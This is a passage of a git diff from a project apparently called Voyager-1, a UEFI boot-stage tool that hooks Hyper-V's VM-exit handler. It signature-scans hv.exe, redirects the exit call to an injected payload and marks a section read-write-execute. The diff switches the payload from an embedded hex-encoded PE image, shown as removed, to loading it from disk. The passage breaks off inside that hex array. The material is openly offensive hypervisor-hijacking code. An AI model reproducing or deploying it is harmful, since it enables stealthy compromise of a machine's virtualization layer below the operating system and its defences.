DBG_PRINT("VmExitHook (PayLoad Entry Point) -> 0x%p\n", VmExitHook); @@ -95,7 +98,7 @@ EFI_STATUS EFIAPI HvBlImgLoadPEImageEx(VOID* DeviceId, VOID* MemoryType, CHAR16* { if (!AsciiStrCmp(&pSection->Name, ".reloc")) { - voyager_t VoyagerData; + VOYAGER_T VoyagerData; MakeVoyagerData ( &VoyagerData, @@ -116,6 +119,9 @@ EFI_STATUS EFIAPI HvBlImgLoadPEImageEx(VOID* DeviceId, VOID* MemoryType, CHAR16* VmExitHook ); + gBS->SetMem(PayLoad, sizeof PayLoad, NULL); + gBS->FreePool(PayLoad); + pSection->Characteristics = SECTION_RWX; pSection->Misc.VirtualSize += PayLoadSize(); DBG_PRINT("VmExitHook (PayLoad Entry Point) -> 0x%p\n", VmExitHook); diff --git a/Voyager-1/Voyager-1 (1703-1511)/Hvix64.c b/Voyager-1/Voyager-1 (1703-1511)/Hvix64.c index 404054c..66f2ffa 100644 --- a/Voyager-1/Voyager-1 (1703-1511)/Hvix64.c +++ b/Voyager-1/Voyager-1 (1703-1511)/Hvix64.c @@ -1,6 +1,6 @@ #include "Hvix64.h" -VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase) +VOID* MapModule(PVOYAGER_T VoyagerData, UINT8* ImageBase) { EFI_IMAGE_DOS_HEADER* dosHeaders = (EFI_IMAGE_DOS_HEADER*)ImageBase; if (dosHeaders->e_magic != EFI_IMAGE_DOS_SIGNATURE) @@ -32,7 +32,7 @@ VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase) { if (AsciiStrStr(VoyagerData->ModuleBase + Name[i], "voyager_context")) { - *(voyager_t*)(VoyagerData->ModuleBase + Address[Ordinal[i]]) = *VoyagerData; + *(VOYAGER_T*)(VoyagerData->ModuleBase + Address[Ordinal[i]]) = *VoyagerData; break; } } @@ -79,7 +79,7 @@ VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase) VOID MakeVoyagerData ( - pvoyager_t VoyagerData, + PVOYAGER_T VoyagerData, VOID* HypervAlloc, UINT64 HypervAllocSize, VOID* PayLoadBase, diff --git a/Voyager-1/Voyager-1 (1703-1511)/Hvix64.h b/Voyager-1/Voyager-1 (1703-1511)/Hvix64.h index 3fc0748..f1ea0ab 100644 --- a/Voyager-1/Voyager-1 (1703-1511)/Hvix64.h +++ b/Voyager-1/Voyager-1 (1703-1511)/Hvix64.h @@ -11,7 +11,7 @@ static_assert(sizeof(VMEXIT_HANDLER_SIG) == 26, "signature is invalid length!"); // AllocBase is the base address of the extra memory allocated below where hyper-v is // AllocSize is the size of the extra allocated memory... This size == module size... // -VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase); +VOID* MapModule(PVOYAGER_T VoyagerData, UINT8* ImageBase); // // sig scan hv.exe for vmexit call and replace the relative call (RVA) with @@ -26,7 +26,7 @@ VOID* HookVmExit(VOID* HypervBase, VOID* HypervSize, VOID* VmExitHook); // VOID MakeVoyagerData ( - pvoyager_t VoyagerData, + PVOYAGER_T VoyagerData, VOID* HypervAlloc, UINT64 HypervAllocSize, VOID* PayLoadBase, diff --git a/Voyager-1/Voyager-1 (1703-1511)/PayLoad.c b/Voyager-1/Voyager-1 (1703-1511)/PayLoad.c index 420df31..5e277a8 100644 --- a/Voyager-1/Voyager-1 (1703-1511)/PayLoad.c +++ b/Voyager-1/Voyager-1 (1703-1511)/PayLoad.c @@ -1,5 +1,9 @@ #include "PayLoad.h" +// this can also just be set at compile time if you want too, but for PoC im going +// to read the payload from disk and delete it after... +VOID* PayLoad = NULL; + UINT32 PayLoadSize(VOID) { EFI_IMAGE_DOS_HEADER* RecordDosImageHeader = PayLoad; @@ -26,262 +30,91 @@ VOID* PayLoadEntry(VOID* ModuleBase) return (UINT64)ModuleBase + RecordNtHeaders->OptionalHeader.AddressOfEntryPoint; } -unsigned char PayLoad[3072] = +EFI_STATUS LoadPayLoadFromDisk(VOID** PayLoadBufferPtr) { - 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, - 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0xB8, 0x00, 0x00, 0x00, 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, - 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, - 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F, - 0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, - 0x44, 0x4F, 0x53, 0x20, 0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A, - 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2F, 0xBF, 0x31, 0xDD, - 0x6B, 0xDE, 0x5F, 0x8E, 0x6B, 0xDE, 0x5F, 0x8E, 0x6B, 0xDE, 0x5F, 0x8E, - 0xDC, 0xAF, 0x5A, 0x8F, 0x6A, 0xDE, 0x5F, 0x8E, 0xDC, 0xAF, 0x5F, 0x8F, - 0x6A, 0xDE, 0x5F, 0x8E, 0xDC, 0xAF, 0x5D, 0x8F, 0x6A, 0xDE, 0x5F, 0x8E, - 0x52, 0x69, 0x63, 0x68, 0x6B, 0xDE, 0x5F, 0x8E, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 0x64, 0x86, 0x05, 0x00, - 0xF8, 0x21, 0x6C, 0x5F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0xF0, 0x00, 0x22, 0x20, 0x0B, 0x02, 0x0E, 0x1B, 0x00, 0x02, 0x00, 0x00, - 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, - 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, - 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, - 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x60, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x06, 0x3A, 0x00, 0x00, - 0x01, 0x00, 0x60, 0x01, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, - 0x6D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, - 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, - 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, - 0xD3, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, - 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x68, 0x2E, 0x72, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x30, 0x01, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, - 0x00, 0x02, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, - 0x2E, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, - 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x40, 0x00, 0x00, 0xC8, 0x2E, 0x70, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, - 0x0C, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, - 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, 0x2E, 0x65, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x6D, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, - 0x00, 0x02, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x40, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x10, 0x48, 0x89, 0x4C, - 0x24, 0x08, 0x56, 0x48, 0x83, 0xEC, 0x50, 0x48, 0x8B, 0x44, 0x24, 0x60, - 0x48, 0x89, 0x44, 0x24, 0x20, 0xB8, 0x02, 0x44, 0x00, 0x00, 0x0F, 0x78, - 0x44, 0x24, 0x28, 0x48, 0x83, 0x7C, 0x24, 0x28, 0x0A, 0x75, 0x64, 0x48, - 0x8B, 0x44, 0x24, 0x20, 0x48, 0xB9, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, 0xBE, - 0xAD, 0xDE, 0x48, 0x39, 0x48, 0x08, 0x75, 0x4F, 0x48, 0x8D, 0x05, 0x79, - 0x00, 0x00, 0x00, 0x66, 0xBA, 0xF8, 0x02, 0x48, 0x8B, 0xF0, 0xB9, 0x13, - 0x00, 0x00, 0x00, 0xF3, 0x6E, 0x48, 0x8B, 0x44, 0x24, 0x20, 0x48, 0xC7, - 0x00, 0xEE, 0xFF, 0xC0, 0x00, 0xB8, 0x1E, 0x68, 0x00, 0x00, 0x0F, 0x78, - 0x44, 0x24, 0x38, 0xB8, 0x0C, 0x44, 0x00, 0x00, 0x0F, 0x78, 0x44, 0x24, - 0x30, 0x48, 0x8B, 0x44, 0x24, 0x30, 0x48, 0x8B, 0x4C, 0x24, 0x38, 0x48, - 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0xB9, 0x1E, 0x68, 0x00, 0x00, 0x0F, 0x79, - 0xC8, 0xEB, 0x21, 0x48, 0x8D, 0x05, 0x6A, 0xFF, 0xFF, 0xFF, 0x48, 0x2B, - 0x05, 0x63, 0x1F, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0x8B, - 0x54, 0x24, 0x68, 0x48, 0x8B, 0x4C, 0x24, 0x60, 0xFF, 0x54, 0x24, 0x40, - 0x48, 0x83, 0xC4, 0x50, 0x5E, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, - 0xCC, 0xCC, 0xCC, 0xCC, 0x67, 0x6F, 0x74, 0x20, 0x63, 0x70, 0x75, 0x69, - 0x64, 0x20, 0x63, 0x61, 0x6C, 0x6C, 0x2E, 0x2E, 0x2E, 0x0A, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0xF8, 0x21, 0x6C, 0x5F, 0x00, 0x00, 0x00, 0x00, - 0x02, 0x00, 0x00, 0x00, 0x59, 0x00, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, - 0x38, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF8, 0x21, 0x6C, 0x5F, - 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, - 0x94, 0x20, 0x00, 0x00, 0x94, 0x06, 0x00, 0x00, 0x52, 0x53, 0x44, 0x53, - 0x04, 0x93, 0x33, 0xD0, 0x10, 0x9B, 0x4C, 0x45, 0xB2, 0x6C, 0xA7, 0x46, - 0x80, 0xBB, 0xAF, 0x4B, 0x0E, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x55, - 0x73, 0x65, 0x72, 0x73, 0x5C, 0x78, 0x65, 0x72, 0x6F, 0x78, 0x5C, 0x44, - 0x65, 0x73, 0x6B, 0x74, 0x6F, 0x70, 0x5C, 0x76, 0x6F, 0x79, 0x61, 0x67, - 0x65, 0x72, 0x2D, 0x31, 0x5C, 0x78, 0x36, 0x34, 0x5C, 0x52, 0x65, 0x6C, - 0x65, 0x61, 0x73, 0x65, 0x5C, 0x54, 0x68, 0x65, 0x47, 0x6F, 0x6C, 0x64, - 0x65, 0x6E, 0x52, 0x65, 0x63, 0x6F, 0x72, 0x64, 0x2E, 0x70, 0x64, 0x62, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, - 0xC0, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6D, 0x6E, - 0x00, 0x00, 0x00, 0x00, 0xC0, 0x10, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, - 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x73, 0x00, 0x00, 0x20, 0x00, 0x00, - 0x38, 0x00, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, - 0x38, 0x20, 0x00, 0x00, 0xEC, 0x00, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, - 0x74, 0x61, 0x24, 0x7A, 0x7A, 0x7A, 0x64, 0x62, 0x67, 0x00, 0x00, 0x00, - 0x24, 0x21, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x2E, 0x78, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, - 0x2E, 0x62, 0x73, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, - 0x0C, 0x00, 0x00, 0x00, 0x2E, 0x70, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, - 0x00, 0x50, 0x00, 0x00, 0x6D, 0x00, 0x00, 0x00, 0x2E, 0x65, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x02, 0x0F, 0x04, 0x00, 0x02, 0x16, 0x00, 0x06, - 0x0F, 0x92, 0x0B, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, - 0xB6, 0x10, 0x00, 0x00, 0x24, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 